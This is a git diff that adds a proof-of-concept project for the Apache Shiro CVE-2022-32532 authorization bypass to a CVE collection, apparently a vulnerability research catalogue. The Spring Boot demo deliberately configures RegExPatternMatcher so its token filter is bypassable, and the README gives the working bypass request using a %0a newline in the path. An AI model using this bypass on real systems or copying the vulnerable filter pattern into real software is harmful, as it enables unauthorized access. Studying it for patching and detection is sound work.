diff --git a/.gitmodules b/.gitmodules index 389186c0193ea7d05d04cb1456c1cec63907e7a9..6ee874bacd796709de4669d922887a302dbfaba8 100644 --- a/.gitmodules +++ b/.gitmodules @@ -5,3 +5,6 @@ [submodule "cve/django/2022/CVE-2022-28346/POC_env"] path = cve/django/2022/CVE-2022-28346/POC_env url = https://github.com/DeEpinGh0st/CVE-2022-28346 +[submodule "cve/apache-Shiro/2022/CVE-2022-32532"] + path = cve/apache-Shiro/2022/CVE-2022-32532 + url = https://github.com/Lay0us1/CVE-2022-32532 diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..549e00a2a96fa9d7c5dbc9859664a78d980158c2 --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore @@ -0,0 +1,33 @@ +HELP.md +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### STS ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### IntelliJ IDEA ### +.idea +*.iws +*.iml +*.ipr + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md new file mode 100644 index 0000000000000000000000000000000000000000..975b036663508428b9af8a0ea9661471e50cbe8b --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md @@ -0,0 +1,35 @@ +# CVE-2022-32532 + +## about + +This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532). + +In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability. + +## introduce + +Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit` + +This request can succeed +```http request +GET /permit/any HTTP/1.1 +Token: 4ra1n +``` + +Access is not allowed when there is no token request header +```http request +GET /permit/any HTTP/1.1 +``` + +It can be bypassed in a simple way in special but common configurations +```http request +GET /permit/a%0any HTTP/1.1 +``` + +## reference + +https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh + +This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978) + +Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher) diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml new file mode 100644 index 0000000000000000000000000000000000000000..5210b54759989fd5ac827dcf2250a9274d7693c5 --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml @@ -0,0 +1,38 @@ + + + 4.0.0 + + org.springframework.boot + spring-boot-starter-parent + 2.7.0 + + + com.example + shiro-demo + 0.0.1-SNAPSHOT + shiro-demo + CVE-2022-32532 + + 1.8 + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.shiro + shiro-spring + 1.9.0 + + + + + + org.springframework.boot + spring-boot-maven-plugin + + + + diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java new file mode 100644 index 0000000000000000000000000000000000000000..fd71b1a0194c0e4d35b816d622aee7368061be9d --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java @@ -0,0 +1,21 @@ +package com.example.shirodemo; + +import org.springframework.web.bind.annotation.PathVariable; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +@RestController +public class DemoController { + @RequestMapping(path = "/permit/{value}") + public String permit(@PathVariable String value) { + System.out.println("success!"); + return "success"; + } + + // Another Bypass + // @RequestMapping(path = "/permit/*") + public String permit() { + System.out.println("success!"); + return "success"; + } +} diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java new file mode 100644 index 0000000000000000000000000000000000000000..beaf98ae02e5cbbea207052fd06305c3ebd48f60 --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java @@ -0,0 +1,35 @@ +package com.example.shirodemo; + +import org.apache.shiro.util.RegExPatternMatcher; +import org.apache.shiro.web.filter.AccessControlFilter; + +import javax.servlet.ServletRequest; +import javax.servlet.ServletResponse; +import javax.servlet.http.HttpServletRequest; +import java.io.IOException; + +public class MyFilter extends AccessControlFilter { + + public MyFilter(){ + super(); + this.pathMatcher = new RegExPatternMatcher(); + } + + @Override + protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) { + String token = ((HttpServletRequest)request).getHeader("Token"); + // todo: check permission ... + return token != null && token.equals("4ra1n"); + } + + @Override + protected boolean onAccessDenied(ServletRequest request, ServletResponse response) { + System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI()); + try { + response.getWriter().println("access denied"); + } catch (IOException e) { + e.printStackTrace(); + } + return false; + } +} diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java new file mode 100644 index 0000000000000000000000000000000000000000..d24431e4e0d43b41931b73c06dfeab64558a19d1 --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java @@ -0,0 +1,40 @@ +package com.example.shirodemo; + +import org.apache.shiro.spring.web.ShiroFilterFactoryBean; +import org.apache.shiro.mgt.SecurityManager; +import org.apache.shiro.util.RegExPatternMatcher; +import org.apache.shiro.web.filter.mgt.*; +import org.apache.shiro.web.mgt.WebSecurityManager; +import org.apache.shiro.web.servlet.AbstractShiroFilter; + + +public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean { + + public MyShiroFilterFactoryBean() { + super(); + } + + @Override + protected AbstractShiroFilter createInstance() { + SecurityManager securityManager = this.getSecurityManager(); + FilterChainManager manager = new DefaultFilterChainManager(); + manager.addFilter("myFilter",new MyFilter()); + // my filter + manager.addToChain("/permit/.*", "myFilter"); + // todo: add other filters + + PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver(); + chainResolver.setFilterChainManager(manager); + // set RegExPatternMatcher + chainResolver.setPathMatcher(new RegExPatternMatcher()); + return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver); + } + + static class SpringShiroFilter extends AbstractShiroFilter { + protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) { + this.setSecurityManager(webSecurityManager); + this.setFilterChainResolver(resolver); + } + } +} + diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java new file mode 100644 index 0000000000000000000000000000000000000000..30a0f1b5101544f54fb098379ca201b45f8a6409 --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java @@ -0,0 +1,22 @@ +package com.example.shirodemo; + +import org.apache.shiro.mgt.SecurityManager; +import org.apache.shiro.web.mgt.DefaultWebSecurityManager; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +@Configuration +public class ShiroConfig { + + @Bean + public SecurityManager securityManager() { + return new DefaultWebSecurityManager(); + } + + @Bean + public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) { + MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean(); + shiroFilterFactoryBean.setSecurityManager(securityManager); + return shiroFilterFactoryBean; + } +} \ No newline at end of file diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java new file mode 100644 index 0000000000000000000000000000000000000000..5d4615bdf9668a276b9f91d48f28d7dea2255212 --- /dev/null +++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java @@ -0,0 +1,13 @@ +package com.example.shirodemo; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class ShiroDemoApplication { + + public static void main(String[] args) { + SpringApplication.run(ShiroDemoApplication.class, args); + } + +} diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml new file mode 100644 index 0000000000000000000000000000000000000000..12fb0f1aced261e773290a27a814ff19ec8c1317 --- /dev/null +++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml @@ -0,0 +1,23 @@ +id: CVE-2022-32532 +source: https://github.com/Lay0us1/CVE-2022-32532 +info: + name: Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。 + severity: CRITICAL + description: | + 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。 + scope-of-influence: + Apache Shiro 1.9.1之前 + reference: + - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh + - https://nvd.nist.gov/vuln/detail/CVE-2022-32532 + - https://www.cybersecurity-help.cz/vdb/SB2022062909 + - https://cxsecurity.com/cveshow/CVE-2022-32532/ + - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32532 + cwe-id: CWE-863 + cnvd-id: CNNVD-202206-2750 + kve-id: None + tags: 旁路授权 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 76b55ee1523e39d3b21a2cffe91e095c91d41365..5d5c89dd537898f0aad7d83cb346d87d988788d3 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -40,7 +40,9 @@ cve: apache-unomi: - CVE-2020-13942 apache-struts: - - CVE-2019-0230 + - CVE-2019-0230 + apache-Shiro: + - CVE-2022-32532 Influx-DB: - CVE-2019-20933 linux-kernel: